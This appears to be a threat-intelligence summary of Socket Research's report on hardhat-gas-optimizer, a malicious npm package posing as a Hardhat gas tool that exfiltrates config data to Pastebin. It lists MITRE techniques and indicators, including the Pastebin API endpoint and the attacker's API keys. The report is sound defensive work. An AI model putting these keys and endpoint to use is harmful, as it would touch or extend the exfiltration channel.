Summary:
The Socket Research team has discovered a malicious npm package named hardhat-gas-optimizer, which impersonates a legitimate tool used by Ethereum developers. This package is designed to exfiltrate sensitive configuration data to Pastebin without user consent, posing significant security risks. Developers are urged to conduct thorough code reviews to prevent such malicious packages from being integrated into their projects.
#npmSecurity #DataExfiltration #EthereumRisks
The Socket Research team has discovered a malicious npm package named hardhat-gas-optimizer, which impersonates a legitimate tool used by Ethereum developers. This package is designed to exfiltrate sensitive configuration data to Pastebin without user consent, posing significant security risks. Developers are urged to conduct thorough code reviews to prevent such malicious packages from being integrated into their projects.
#npmSecurity #DataExfiltration #EthereumRisks
Keypoints:
Malicious npm package named hardhat-gas-optimizer impersonates the legitimate hardhat-gas-reporter.
The package targets Ethereum developers using the Hardhat development environment.
It was uploaded to npm in February and claims to optimize gas usage during smart contract deployment.
The package exfiltrates the contents of the hre.config configuration file to Pastebin.
Security risks include unauthorized data exfiltration and privacy violations.
Socket flagged this package as malware, providing automatic protection for users.
MITRE Techniques
Data Exfiltration Over Command and Control Channel (T1041): The package sends sensitive configuration data to Pastebin without user consent.
Exploitation of Remote Services (T1210): The malicious package exploits the Hardhat framework to execute unauthorized actions.
IoC:
[URL] hxxps://pastebin.com/api/api_post.php
[API User Key] d8186f40984375851b912c75b5bd24e7
[API Developer Key] zCviLVtg0oHC2aT_xQ_7VU96pzxM35ju
Full Research: https://socket.dev/blog/malicious-npm-package-targets-ethereum-developers